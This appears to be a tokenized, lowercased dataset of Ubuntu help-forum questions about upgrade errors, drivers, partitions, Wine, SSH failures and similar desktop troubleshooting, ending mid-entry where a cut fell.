116327	unable to upgrade due to `` systemerror : e : method has died unexpectedly ! '' error	these are the errors shows by different client update manager : traceback ( most recent call last ) : file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 968 , in simulate trans.unauthenticated = self._simulate_helper ( trans ) file `` /usr/lib/python2.7/dist-packages/aptdaemon/worker.py '' , line 1092 , in _simulate_helper return depends , self._cache.required_download , \ file `` /usr/lib/python2.7/dist-packages/apt/cache.py '' , line 235 , in required_download pm.get_archives ( fetcher , self._list , self._records ) systemerror : e : method has died unexpectedly ! , e : sub-process returned an error code ( 100 ) , e : method /usr/lib/apt/methods/ did not start correctly synaptic package manager e : method has died unexpectedly ! e : sub-process returned an error code ( 100 ) e : method /usr/lib/apt/methods/ did not start correctly e : unable to lock the download directory command : sudo apt-get upgrade reading package lists ... done building dependency tree reading state information ... done the following packages will be upgraded : libfreetype6 libfreetype6-dev 2 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . failed to exec method /usr/lib/apt/methods/ e : method has died unexpectedly ! e : sub-process returned an error code ( 100 ) e : method /usr/lib/apt/methods/ did not start correctly can anyone one tell me how to resolve these issues ? i have no volatile packages or anything so i am even posting the preview of my sources.list file . # deb cdrom : [ ubuntu 10.10 _maverick meerkat_ - release i386 ( 20101007 ) ] / maverick main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //in.archive.ubuntu.com/ubuntu/ oneiric main restricted # # major bug fix updates produced after the final release of the # # distribution . deb http : //in.archive.ubuntu.com/ubuntu/ oneiric-updates main restricted # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //in.archive.ubuntu.com/ubuntu/ oneiric universe deb http : //in.archive.ubuntu.com/ubuntu/ oneiric-updates universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //in.archive.ubuntu.com/ubuntu/ oneiric multiverse deb http : //in.archive.ubuntu.com/ubuntu/ oneiric-updates multiverse # # uncomment the following two lines to add software from the 'backports' # # repository . # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . # deb http : //in.archive.ubuntu.com/ubuntu/ maverick-backports main restricted universe multiverse # deb-src http : //in.archive.ubuntu.com/ubuntu/ maverick-backports main restricted universe multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . deb http : //archive.canonical.com/ubuntu oneiric partner deb-src http : //archive.canonical.com/ubuntu oneiric partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu oneiric main deb-src http : //extras.ubuntu.com/ubuntu oneiric main deb http : //in.archive.ubuntu.com/ubuntu/ oneiric-security main restricted deb http : //in.archive.ubuntu.com/ubuntu/ oneiric-security universe deb http : //in.archive.ubuntu.com/ubuntu/ oneiric-security multiverse # deb http : //archive.canonical.com/ lucid partner here is the preview of my sources.list file
116331	why is ubuntu using so much memory ?	i have just turned on my pc and have two applications running ; thunderbird and firefox . whatever else is running is part of ubuntu 's feature set ( as well as a few indicators ) . this has been ongoing for weeks , so i 'm not sure if it 's normal behaviour or not . right now , my memory usage indicator says that ubuntu is using 41 % of my 6gb of ram . i have n't even opened gimp or my other day-to-day things . i 'll be buying another 6gb of ram , this week , so that i do n't run out when using gimp or openshot , for example . an overview of my running applications shows that nautilus is using the most , yet it is n't even open . this seems a little excessive , or am i missing something ?
116337	no audio output on an asus g74s	in 11.10 on an asus g74s i have no audio output . i 'm new to ubuntu/linux and want to learn how to fix this issue .
116340	add more disk space to partition ( 11.10 )	ubuntu is complaining that it 's running out of space , and indeed , df yields : filesystem size used avail use % mounted on /dev/loop0 17g 15g 462m 98 % / /dev/sda2 385g 18g 368g 5 % /host so apparently i only have 17 gigs available on my ubuntu installation . when i run gparted , i see a /dev/sda2 and a /dev/sda1 both well over 100g . my computer should have something like 600g available . is there any way i can add more disk space to /dev/loop0 , whatever that is ? please explain to me as if i were a child . i also do n't have an ubuntu cd .. i installed it with wubi . i 'm hoping i can just do this straight from the os , but i understand i may have to do it from the bios . i have read something like boot from the cd and use gparts that does n't mean anything to me , so if that 's what i need to do , please explain how to do that specifically .
116343	all windows decorations disappear after i maximize any window	when i maximize some of the windows all decorations disappear ( by all , i mean on all windows ) ... is that common issue on unity or i 'm just unlucky to have some prone to that bug configuration ? anyone have idea how to fix this ? it wo n't fix after unmaximize . it seems like maximazing window simply crashes window decorator . decoration is n't displayed for all existing windows and any new ones . only way i found to fix this is to run compiz -- replace ( but this ruins current windows placement - all windows end up on same desktop ) . it happens almost every time i maximize window .
116349	run google chome on legacy 7.10 computer ?	i managed to install google-chrome on an ubuntu 7.10 system with -- force-depends . but now when i try to run it , i get this error : /usr/bin/google-chrome : error while loading shared libraries : libnss3.so : can not open shared object file : no such file or directory is there a way to still get google-chrome to load even without this dependency satisfied ? this is an old system that needs to keep this old 7.10 ubuntu version installed , meaning that it can not have a system upgrade because of legacy software that needs to be in the 7.10 system and can not be installed in any other linux version . because of this legacy software that can not be installed in any other system other than 7.10 , what i am trying to achieve is instead try to get google-chrome to work on this 7.10 system . i would like to have google-chrome running if at all possible , even if it means no sound or other features that are not compatible .
116351	increase partition size on which ubuntu is installed ?	i have ubuntu installed on a drive . the problem is it is running low on disk space . this is installed on vmware . i expanded the virtual drive and booted into ubuntu . but when i opened gparted ( sudo gparted ) , the move/resize option is unavailable . this is the partition ubuntu is installed on , but i need to resize it . any ideas ? i am comfortable using command line
116357	which architectures to support ?	i 'd like to provide a `` deb '' package for my software , now i wonder which are the architectures to support ? the goal is ubuntu 11.10 and above . i386 and amd64 ?
116360	strategy for package searching	i am using 11.10 the amd64 version ( i assume , but i do n't know how to figure that out ) . now when i add a section to /etc/apt/source.list.d/foo.list : deb http : // < myserver > /download/public stable main and put my package in http : // < myserver > /download/public/dists/stable/main/binary-amd64/ i get an error : err http : // < myserver > stable/main i386 packages 404 not found now the question is : do i have to provide a packages ( .gz ) in the binary-i386 subdirectory even if it is empty ? this is not a i386 package and i do n't request one on the command line . does ubuntu require both architectures to be available ?
116363	does ubuntu server use the gpu in any way ? [ gpu temperature ]	i have an old laptop with a geforce g 105m running ubuntu server without gui and the fan is always blowing because the gpu never goes under 60ยบc with the computer completely idle ! is this normal or some kind of hardware malfunction ?
116364	thunderbird - remove unused dictionaries from menu	i use thunderbird with two sets of dictionaries : english and spanish . in the spell checker menu i find about 30 localized dictionaries ( all spanish-speaking countries , and for english : us , england , canada ) . it 's quite annoying that every time i need to look for the single proper dictionary , i see all this heap of other dictionaries ( useless for me ) . is there any way to remove the unused dictionaries from the menu and leave 2 or 3 that i really use ?
116373	invisible mouse cursor	there have been some similar posts but nothing specific to me . sometimes i boot my laptop and all is well . other times i boot up and after the login screen my mouse cursor disappears , i can still use it , its just invisible . i start up fire fox and the cursor is visible but only on the application window ... . my sysetem is : samsung r60 plus , with 4gb ram and a t7500 , using the ati xpress 1250 graphics . this is with ubuntu 11.10 . does any one know of a work around ?
116374	wubi fails to start on an acer aspire 4750g	yesturday i tried to install ubuntu with wubi to my laptop ( acer aspire 4750g ) . i have a windows7 sp1 now . first i tried install 12.04 , but after when it offer to restart the computer i saw an error . i thought it was becouse it not a stable release now , so i tried again with 11.10 and 10.04 ( lts ) . same problem . i attached an image , this message when i restart the computer . error message
116378	how do i set up my edimax br-6428ns wireless router	i have looked into ask ubuntu but i ca n't find an answer of the edimax br-6428ns model . you can download a source code in a zip file but i do not know how to open the source code file or how to run the source code once i 've opened it .
116379	how can i request password when usb hardware is plugged in ?	at the moment i use xubuntu 11.10 , my question is : how can i request password when usb hardware is plugged in ? example : i plug usb mass storage : now xubuntu open a window and show me files and folders of a usb mass storage . i want that when i plug usb mass storage ( or any other usb hardware ) ask a `` root/sudo '' password and after show files and folder or make other operations .
116383	how to setup a shared folder on mythbuntu without using samba ?	we do n't have windows at home , so do n't use samba . can nfs be used natively between ubuntu and mythbuntu machines ?
116384	can i run ms office apps installed under windows ?	i do n't have the option of installing the ms office apps under wine mostly as i simply do n't have them , but these apps do exist on the workstation i use at work . i have installed ubuntu on this machine on the same partition as ms windows via the run-ubuntu-as-a-windows-app ( not quite verbatim ) installation instructions . the ms windows is xp professional and the ms office version is 2007 . perhaps there are two scenarios , one where i can simply use the apps where they sit , and another where i can somehow `` install '' the existing executables into ubuntu ( wine ? ) rather than installing their iso 's ( or whatever ) , which , again , i do n't have . anyway , whatever you can tell me about this is good with me .
116389	wine is no longer able to initialize opengl	since a while , wine is no longer able to initialize opengl on my 64bit linux . this is by no means a unique problem to me- lots of people with nvidia cards running 64bit linux seem to have this problem with wine on oneiric : http : //forum.winehq.org/viewtopic.php ? p=66856 & sid=9d6e5ad628ee6fb6e5ef04577275daed http : //forum.pinguyos.com/thread-wine-opengl-problem https : //bbs.archlinux.org/viewtopic.php ? id=137696 and while some launchpad bug reports say one should use this workaround : ld_preload=/usr/lib32/nvidia-current/libgl.so.1 wine < app > it unfortunately does not solve the problem at all for me ; that is , if i 'd run cs : s , the game will run just fine for a while , but will abort after some time , including a range of glsl-related errors . here the startup errors from simply running steam : + wine steam.exe fixme : process : getlogicalprocessorinformation ( ( nil ) ,0x33e488 ) : stub [ .. snip ... ] fixme : dwmapi : dwmsetwindowattribute ( 0x1009a , 3 , 0x33d384 , 4 ) stub fixme : dwmapi : dwmsetwindowattribute ( 0x1009a , 4 , 0x33d374 , 4 ) stub err : wgl : is_extension_supported no opengl extensions found , check if your opengl setup is correct ! err : wgl : is_extension_supported no opengl extensions found , check if your opengl setup is correct ! err : wgl : is_extension_supported no opengl extensions found , check if your opengl setup is correct ! [ ... this error is being reported a few dozen times , so snip again ... ] err : wgl : is_extension_supported no opengl extensions found , check if your opengl setup is correct ! err : wgl : is_extension_supported no opengl extensions found , check if your opengl setup is correct ! err : wgl : is_extension_supported no opengl extensions found , check if your opengl setup is correct ! err : wgl : is_extension_supported no opengl extensions found , check if your opengl setup is correct ! fixme : iphlpapi : notifyaddrchange ( handle 0x47cdba8 , overlapped 0x45dba80 ) : stub fixme : winsock : wsalookupservicebeginw ( 0x47cdbc8 0x00000ff0 0x47cdbc4 ) stub ! [ ... snip ... ] here are the errors reported while running , and after running ( because the log is huge-ish , it 's pasted elsewhere ) : http : //paste.ubuntu.com/901925/ now , 32bit opengl works just fine ; the 32bit executables of nexuiz , for example , work just fine . that being said , i 'm suspecting that this is a problem of wine itself . i 've already manually built the git version of wine , to no avail . so what 's going on ? is something broken ? how do i check ( correctly ) whether something is broken ? how do i solve this ? additional information : my gpu : $ lspci | grep vga 01:00.0 vga compatible controller : nvidia corporation g92 [ geforce 9800 gt ] ( rev a2 ) installed via dpkg ( using the 'ubuntu x-swat ' ppa : https : //launchpad.net/~ubuntu-x-swat/+archive/x-updates ) . driver version : 295.33 the error also occurs when manually installing the latest driver , though . glxinfo : http : //paste.ubuntu.com/906976/ glxinfo from 32bit executables of mesa-utils ( apt-get download'ed and unpacked , etc ) : http : //paste.ubuntu.com/906980/ version of wine : wine-1.5.0 ( manually built from the git repository , however the prebuilt version triggers the same error , as explained above ) desktop env : kde4.2 , but same error occurs under gnome and xfce likewise . kernel stuff ( uname -a ) : linux leuchtturm 3.0.0-17-generic # 30-ubuntu smp thu mar 8 20:45:39 utc 2012 x86_64 x86_64 x86_64 gnu/linux tried a clean wine prefix ( wineprefix= $ home/tmp/wine wine ... ) , did n't help either . some more possibly related information : when running the direct3d application from an old bug opened by me , wine does n't report any opengl errors at all : http : //bugs.winehq.org/attachment.cgi ? id=25707 ( source is included , it 's just a really trivial test app ) . i 'm not sure what the heck is going on .
116397	media software to combine video and audio	i need something that can help me combine my video files with .srt subtitle tracks . any ideas ? i dont want to use the terminal and command lines , just a simple programme like autogk used to be in windows . any ideas what i could use ? thanks
116399	how do i stop tor from exiting ?	hi sorry for asking this question i 've googeled for this solution but i didnt find anything ! i 've installed tor or vadalia but when i want to run it it give me this error : vidalia detected that the tor software exited unexpectedly . i dont know how to stop it ! sorry because i 'm newbie in ubuntu and i knew that my qestion is so redculous but i need to connect to the internet by tor and i cant fix it ! tnxxxxx alot for responding !
116404	can i install lamp server on ubuntu one private cloud ?	is this possible to install apache server , mysql database , and php on the ubuntu one private cloud ? can i use a ubuntu one private cloud as my personal web server ? if yes , then how ?
116405	build binary deb package from python source	i have created python package ( using ubuntu quickly ) and want to create deb package . unfortunatelly quickly builds package with source python files ( .py ) and i want not to include source files . the same problem is with bazaar plugin for building packages . how can i make deb package without sources which compiles .py files during installation , so there will be no source files in the system ?
116407	debugging the execution order of upstart jobs	i 'd like to be able to debug the execution order of the jobs started by upstart ( ideally without injecting dumping code into every job file ) . how can i do this ?
116408	ubuntu 10.10 dns lookup failed	i have an ubuntu meerkat ( 10.10 ) and my dns fails . i am connecting via proxy and i have set both $ http_proxy variable and system wide settings for it . when i try to ping 8.8.8.8 i get icmp response . however when i tried to ping www.google.com , it results in ping : unknown host google.com i changed my /etc/resolv.conf file which had faulty nameservers . i gave : domain xx.yy.com search xx.yy.com nameserver aa : bb : cc : dd however as the network manager is set , when i restart networking , the resolc.conf gets reset to some other nameserver . i know i can set static dhcp and change the interfaces file but i would like to work with nm . so please advice !
116419	how can i access one desktop session from another on the same machine ?	i want to run a desktop session as user a , and from that session access a different desktop session as user b . this way i can test , screencast or share my screen from session b , while having access to apps/resources in session a that i do not want running/visible in session b . what application can i do this with ? i assume some kind of a remote desktop client/server is what i 'm looking for . so far i have tried : vnc . logged in as user a and user b . in session b run desktop sharing . switched to session a . tried to access share with remmina . failed . ( can get image to appear but it 's frozen . ) x2go . installed server and client from stable ppa ( needed a workaround for installation to succeed ) . created a connection which starts then fails instantly . discovered mailing list post suggesting that accessing localhost is not supported . on the non-remote front : virtualbox . created a minimal virtual machine for session b . too resource heavy . am i attempting the impossible ? should i be looking for something other than a remote desktop tool ?
116422	permission problems in system directories	please , i am using ubuntu 11.10 and i made a mistake in system directories , changed permissions of all content to 777 . i was trying to correct some files , but i cant fix all directories and files . can i return to default permissions ? ? thanks .
116425	is there a way to avoid skype and pidgin windows to show up at startup	i have both skype and pidgin set up to automatically launch and sign in at startup and i do want that . however , what i hate is that every time i boot or reboot , both window show up open and i have to manually close them . i just want the two programs to launch silently and only show up as tray icons , without opening their windows every time at startup . i ca n't seem to find any such option in either of them .
116428	ubuntu hdd always takes boot priority	i have three hard drives installed on my machine , they are arranged chronologically in boot priority in my bios : 64 gb ssd windows seven | nfts 120 gb hdd ubuntu 11.10 | dat4 500 gb hdd storage for both | nfts what i am looking to do is make it so that grub will boot windows 7 as my primary os and always offer the option of ubuntu . currently , grub is on the mbr of the 120 gb hdd ( second in boot priority ) ; and always boots ubuntu by default . the only method i have found to getting windows 7 to boot automatically is by physically detaching the hdd . i am running a custom built machine , 64-bit architecture lga 1155 mother board ; let me know if you need any other system information . i am hoping to boot grub and have windows 7 as the default option .
116436	help with creating my own lens	i wan na create my first unity lens , but i do n't know how it works , i have been trying to follow this tutorial http : //developer.ubuntu.com/resources/technologies/unity/lenses-and-scopes/ but i do n't know where to put my files . they only say where to put the .lens file `` /usr/share/unity/lenses/mylens/mylens.lens '' and i do n't know what this means dbusname=net.launchpad.lens.mylens dbuspath=/net/launchpad/lens/mylens anyone that could tell me where to put the files or how to export it or what i need to do to get my first lens to work . i just wan na create a lens first , and then i can play with the code and make something useful .
116440	how to install mysql cluster ?	how to install mysql cluster 7.1 or 7.2 on ubuntu 10.11 ? on a fresh install of ubuntu , we must uninstall pre-installed mysql before ? what is the best way , use .tar.gz on mysql website with or witout glibc or user apt-get install mysql-cluster-client-5.1 and mysql-cluster-server-5.1 ? i think that have a bug with these packages.. please help . thx .
116442	how do i get a samsung scx 5737fw printer working ?	can anyone please help ? i am trying to install samsung printer scx 5737fw on ubuntu 11.10 , but when i plug in the usb cable it tries to look for the driver , but ca n't find it . indeed the webpage http : //www.samsung.com/uk/consumer/print-solutions/print-solutions/mono-multi-function-products/scx-5737fw/see-spec tells me that the printer is supported up to ubuntu 10 . this true because it installs perfectly on my other machine with ubuntu 9 . can anyone help please ? thanks
116443	dual os backup windows and linux , including filesharing	i would like to back up and store all my files in one place . i am quite tempted by a western digital my book live because of autobackup from windows and the ability to access the files on the network and also through a personal cloud . at home i have a mixture of win 7 , xp and ubuntu 11.04 , 11.10 ( though shortly both will be 12.04 ) i am looking for a personal cloud like solution that i can use to both back up and access from windows and linux . i want autoback preferably from linux and windows.as i have a mix of os i wondered how well these drives play with both os .
116448	screen dims on opening certain applications on macbook	i have ubuntu 11.10 installed on an old 2008 macbook . there is an issue of screen dimming that i didnt find anywhere else on the forums . the issue is that the screen is dimmed when i open certain applications ( firefox , software center ) and this can not be readjusted by the physical brightness buttons on the keyboard . i tried a bunch of things on the barely barely visible screen , and had no choice but to restart . this has happened everytime . does anyone know how to solve this ?
116450	system checks for disk drive error every time it boots	when my disk space for the ubuntu installation partition was getting low , from a live cd , i used gparted to increase its volume capacity , by deleting another partition and merging it to the ubuntu partition . since then , i am always receiving disk checking for errors at boot screen for my partitions . what seems to be causing this and how can i fix it ? update here is my boot.log if it provides few insight fsck from util-linux 2.19.1 fsck from util-linux 2.19.1 /dev/sda1 was not cleanly unmounted , check forced . ubuntu : clean , 501325/1310720 files , 2958455/5242880 blocks /dev/sda1 : 241/51272 files ( 3.3 % non-contiguous ) , 73541/102400 blocks mountall : fsck /boot [ 358 ] terminated with status 1 skipping profile in /etc/apparmor.d/disable : usr.bin.firefox ... /dev/sda1 is a separate grub partition for my dual os's
116454	how to enable clickable notifications for pidgin ?	i want to make the notifications ballons for pidgin clickable , so i can click on it and it should take me throgh direct to the chat window . is this possible ? i 'm using ubuntu 11.10 .
116460	stop keyboard shortcuts information screen appearing	if i hold windows key & click , this keyboard shortcuts screen appears . is there any way i can stop this appearing altogether ?
116468	how can i switch back to an application without launcher and alt+tab ?	so , normally when i run eclipse it is shown in both alt+tab and unity launcher . now i have a running eclipse , i minimised it and i ca n't switch to eclipse any more . is there other way to switch back to an application without using unity launcher or alt+tab ?
116469	installer crashed ! ! ! help needed !	i am new to ubuntu . so i was trying it out before i get accustomed to it . today while installing ubuntu 10.10 from the try now desktop , the installer has been crashing in the middle of installation . asking this question , through the try now desktop .
116470	code for `` left backslash '' key	i am redefining the keyboard layout ( in a symbol file ) and can not find the name of the `` left backslash '' key ( available on 102 keys keyboards , usually to the left of the z key or the space key ) .
116478	wd external hard drive not detected	i am a beginner in ubuntu . and i have just installed ubuntu 11.10 in my dell laptop . when i plugged my wd external hard drive in , it read the first time , but since i have a unlock.exe file ( password for the hard drive ) . so i installed wine to read it . but it gives me an error . i restart the machine , and plugged the hard drive in again . and it is not recognized anymore . can anybody help me , please ? thank you !
116479	how do i host my own bazaar shared repositories ?	what i want ? we operate in a small team of 9 people including developers , qa and designers . i want to setup a version control . we have a ubuntu ( server edition ) and i want to host all our repositories there . i have no understanding that even if it is possible . what i have done ? we have setup bazaar on all distributions . we are using bazaar explorer as our gui front-end . the command edition from console is n't very comfortable to all members . we have gone through the manual , but it has n't been very helpful . our inexperience being the cause . team the designers are using windows distribution and developers & qa are using ubuntu distributions . i have googled around and i am really struggling to find a good tutorial for this setup . so any links/guides/leads towards accomplishing the same would be very helpful . while posting links or answer please do consider our inexperience .
116481	ssd on usb 3.0 does n't always mount	the ssd i use is apparently slightly damaged . at the moment it shows this popular corsair series 3 problem . symptoms : the disk is working for some minutes and then just suddenly stops . two months ago it worked like a charm . this was my boot device in these days . so now i still need to copy some data out of the device which leads me to my question . usually the ssd is working again for some minutes , when i unplug and replug its power . it gets detected by the system again and i can continue my backup . the problem on ubuntu is , that it is not recognized again after two or three replugs . i have to reboot to bring it back . to specify this situation : when i unplug and replug my usb mouse before i reboot it is not recognized as well . so something seems to be wrong with the system also . my question : how do i fix this rebooting issue ? i will post all the logs you need to analyse . the problem does n't depend on the interface . i tried usb3.0 , 2.0 and sata already . my system : ubuntu 11.10 , gigabyte g41mt-s2p , intel e6750 corsair force series 2 - f120 , digitus usb 3.0 adapter , usb 3.0 interface card
116484	problem uninstalled and reinstall chrome	i uninstalled using the software centre , but the minute i reinstalled google chrome , the extensions and everything were still there ... how do i remove this ? thanks .
116485	lxterminal not working	my lxterminal is not working . here 's some background : a few days ago i wanted to configure the keyboard layouts for my lubuntu 11.10 for english and romanian . you can find a detailed description of what i did here : so , it worked for a few days . today it stopped working again . so i started reading forums again . i tried to follow this forum . so i went up in the terminal , went into the .bashrc file and added this sudo tee -a /etc/xdg/lxsession/lubuntu/autostart right after this : setxkbmap -layout `` us , ro ( winkeys ) '' -option `` grp : ctrl_shift_toggle '' then pressed ctrl+x and enter . almost at the same time i installed some system updates . a few minutes later i wanted to use the terminal again , and i noticed that the terminal no longer starts with the line user @ user-pc : - $ . instead , it jumps straight to this : [ sudo ] password for dora : i type in the password but nothing happens . also , whatever other command i try to type , it just gets returned . no errors messages , nothing . please help . ps : funnily , i just noticed that i am now able to type in romanian again !
116488	unable to boot ubuntu after update	i have updated ubuntu 11.10 to 3.0.0.17 generic and after updating ubuntu did n't boot . why would that occur ? how to recover ubuntu if it does n't boot . it worked in recovery mode but could n't load gui.help me please ! !
116491	ubuntu one and hidden files sync	libreoffice uses a file to lock documents you are editing that has a . ( period ) as the first letter of the name . ubuntu one does not sync this file so i have no protection from multiple editors of a document at one time . how do i make ubuntu one sync every document , including hidden ones ? thanks . mike .
116494	how can i add more wallpapers ?	how do i increase the amount of wallpapers that appear on the menu for customizing the desktop with my backgrounds in 11.10 ? i added more images to the respective folder in /usr/share/background as root , but the list does not remain persistent . the images in 11:10 changes alone . so i want to add funds to enhance the environment . when i copy the images to the folder /usr/share/backgrounds the list is updated and increased . but only for the first time . thereafter , the system ignores the other images , and the list of funds has become original as first . any help ?
116495	command line move file with long directory path without repeating directory path	is there any way of executing a mv command without typing the full path in the second argument ? example : mv my/file/that/has/a/really/long/path/foo.bar some_magic_operator_that_means_the_same_directory/foo.baz
116496	how do i adjust the brightness on a toshiba satellite l750/l755 ?	can you please help me ? i tried everything i found and nothing worked . for example , i modified grub configuration file , installed xbacklight and tried setpci command .
116498	facebook application apache setup	i 'm trying to setup the dev environment for facebook apps and i was following official hiroku guide for setting up everything for local development ( https : //devcenter.heroku.com/articles/facebook # create_an_app ) . i get everything , except one step : apache setenv if youâre running your app with apache , you can set the env vars for your local appâs virtualhost using the setenv directive . for example : ... can anyone clarify this step , and explain what i am doing , and tell me where this virtualhost file is , because i searched all over /opt/lampp/ folder , and there is n't one . thanks in forward
116499	ubuntu one and missing folders from thunderbird	i have thunderbird 11 installed on ubuntu 11.4 i copied the mail folder ( plus subfolders ) to the ubuntu one sync folder , and now when opening thunderbird all my local folders are missing . the folders are still physically on my hard drive in the correct place and the message store setting is correct but the folders are n't showing . what 's gone wrong ? thanks sam
116500	installing ubuntu 11.04 fails on dell m6600	i have a dell m6600 with ubuntu 10.04 howver the x drivers are pretty messed up due to the following issues : 1 . after booting the mouse automatically moves to the left top corner of the screen and keeps clicking continuously , 2. the mouse loses focus between windows , making it difficult to switch between the open application windows . so i thought of upgrading to ubuntu 11.04 and that failed . has anyone succesfully installed ubuntu 11.04 or 12.04 beta on a dell m6600 ? ?
116507	ubuntu live usb with persistence mode , how to install nvidia driver ?	im trying to install graphics drivers on my usb ubuntu live , but i get errors when i activate them . through the hardware drive window . would be nice if some gave me a tutorial of installing ubuntu 10.04 32bit on a usb drive for a live and persistence mode . then installing nvidia drivers . i even tried manually installing it , but when i stop the x-server i get a screen saying checking battery and an [ ok ] at the far right . and it just sits there . need help please !
116515	wine wont install from softwarecenter	when i try to install wine i get following message : wine1.2 : predepends : dpkg ( > = 1.14.12ubuntu3 ) but 1.16.0.3ubuntu5 will be installed depends : ia32-libs ( > = 1.6 ) but 20090808ubuntu26 will be installed depends : lib32asound2 ( > 1.0.14 ) but it will not be installed depends : libc6-i386 ( > = 2.6-1 ) but it will not be installed and also a message saying that there is a possibility that software packages ca n't be installed both , is there someone who knows what may be causing this error ?
116517	i have eclipse 3.5.2 on my 64-bit ubuntu 10.10 box , but i can not use eclipse install new software	i have ubuntu 10.10 64-bit . i installed eclipse via the sudo apt-get install eclipse eclipse-cdt i ended up with eclipse 3.5.2 . it works like a charm . but there was no adb . so i went to help- > install new software and it let 's me choose the galileo update site . but when i use it , it just says `` no repository found '' . my immediate goal is to install adb . but i 'd like to install the entire adt and i 'd like `` install new software ... '' in my eclipse in general to work .
116520	data usages check option for docom mf631 in ubuntu 11.10	i connect my usb modem docomo mf631 in ubuntu 11.10 from the help of this site : configuring tata photon + usb modem huawei ec156 . now ist problem is that i do n't know my connection speedin ubuntu . in xp i can check my speed nearly 240 kbps ( 2x ) . 2nd how to check remaining balance ( data usages ) . xp mode docomo running setup allow check usages by *123 # ( i 'm using bsnl 3g sim converted in 2g in docomo donggle ) need help ... ... ... .
116527	software for ubuntu	i m new user for ubuntu 11.10 ... in ubuntu 11.10 take much time for specified software via software center . for example i download wine for window uploader using usb data card @ 2g speed . its take nearly 3 hours for installation . but in winxp u can download .exe file with download manager very fast ( 100 mb in 40 min . with bsnl sim ) and installed it any time . now i want to know how to download fast in ubuntu 11.10 my requirement is under please . fdm for video download via youtube.com using browser audio/video codec for verious format like flv , 3gp avi , hindiindic ( ime ) /english option for office work ( in ms office i can change typing language by pressing alt+shift key ) nero
116530	how to digitize old vinyl records ?	out with the old stuff . i want to digitize my old vinyls . what would be necessary to do that ?
116531	how can i configure and use a huawei e173 hsdpa usb modem ?	i 've tried a lot with different ways but i need something real to configure it here in mexico . i ca n't work it on with no ubuntu 's os ( 10.04 and 11.10 ) . can you please help sort this out ?
116534	broken ssh - `` write failed : broken pipe '' and `` setresuid 1000 : resource temporarily unavailable ''	i seem to have broken ssh on my machine ! if i run : sudo /usr/sbin/sshd -d i get : debug1 : sshd version openssh_5.8p1 debian-7ubuntu1 debug1 : read pem private key done : type rsa debug1 : checking blacklist file /usr/share/ssh/blacklist.rsa-2048 debug1 : checking blacklist file /etc/ssh/blacklist.rsa-2048 debug1 : private host key : # 0 type 1 rsa debug1 : read pem private key done : type dsa debug1 : checking blacklist file /usr/share/ssh/blacklist.dsa-1024 debug1 : checking blacklist file /etc/ssh/blacklist.dsa-1024 debug1 : private host key : # 1 type 2 dsa debug1 : read pem private key done : type ecdsa debug1 : checking blacklist file /usr/share/ssh/blacklist.ecdsa-256 debug1 : checking blacklist file /etc/ssh/blacklist.ecdsa-256 debug1 : private host key : # 2 type 3 ecdsa debug1 : rexec_argv [ 0 ] ='/usr/sbin/sshd' debug1 : rexec_argv [ 1 ] ='-d' set /proc/self/oom_score_adj from 0 to -1000 debug1 : bind to port 22 on 0.0.0.0 . server listening on 0.0.0.0 port 22. debug1 : bind to port 22 on : : . server listening on : : port 22 . then from another terminal : ssh localhost gives me : write failed : broken pipe and in the debug i get : debug1 : server will not fork when running in debugging mode . debug1 : rexec start in 5 out 5 newsock 5 pipe -1 sock 8 debug1 : inetd sockets after dupping : 3 , 3 connection from : :1 port 57699 debug1 : client protocol version 2.0 ; client software version openssh_5.8p1 debian-7ubuntu1 debug1 : match : openssh_5.8p1 debian-7ubuntu1 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.8p1 debian-7ubuntu1 debug1 : permanently_set_uid : 114/65534 debug1 : list_hostkey_types : ssh-rsa , ssh-dss , ecdsa-sha2-nistp256 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : kex : server- > client aes128-ctr hmac-md5 none debug1 : expecting ssh2_msg_kex_ecdh_init debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug1 : ssh2_msg_newkeys received debug1 : kex done debug1 : userauth-request for user tdiethe service ssh-connection method none debug1 : attempt 0 failures 0 debug1 : pam : initializing for `` tdiethe '' debug1 : userauth-request for user tdiethe service ssh-connection method publickey debug1 : attempt 1 failures 0 debug1 : test whether pkalg/pkblob are acceptable debug1 : pam : setting pam_rhost to `` zoostorm '' debug1 : pam : setting pam_tty to `` ssh '' debug1 : checking blacklist file /usr/share/ssh/blacklist.rsa-2048 debug1 : checking blacklist file /etc/ssh/blacklist.rsa-2048 debug1 : temporarily_use_uid : 1000/0 ( e=0/0 ) debug1 : trying public key file /home/tdiethe/.ssh/authorized_keys debug1 : could not open authorized keys '/home/tdiethe/.ssh/authorized_keys ' : no such file or directory debug1 : restore_uid : 0/0 debug1 : temporarily_use_uid : 1000/0 ( e=0/0 ) debug1 : trying public key file /home/tdiethe/.ssh/authorized_keys2 debug1 : could not open authorized keys '/home/tdiethe/.ssh/authorized_keys2 ' : no such file or directory debug1 : restore_uid : 0/0 failed publickey for tdiethe from : :1 port 57699 ssh2 debug1 : userauth-request for user tdiethe service ssh-connection method password debug1 : attempt 2 failures 1 debug1 : pam : password authentication accepted for tdiethe debug1 : do_pam_account : called accepted password for tdiethe from : :1 port 57699 ssh2 debug1 : monitor_child_preauth : tdiethe has been authenticated by privileged process debug1 : pam : establishing credentials user child is on pid 16189 debug1 : selinux support disabled debug1 : pam : establishing credentials debug1 : permanently_set_uid : 1000/0 setresuid 1000 : resource temporarily unavailable debug1 : do_cleanup debug1 : do_cleanup debug1 : pam : cleanup debug1 : pam : closing session debug1 : pam : deleting credentials it seems to be the setresuid 1000 : resource temporarily unavailable that is causing the problem - any 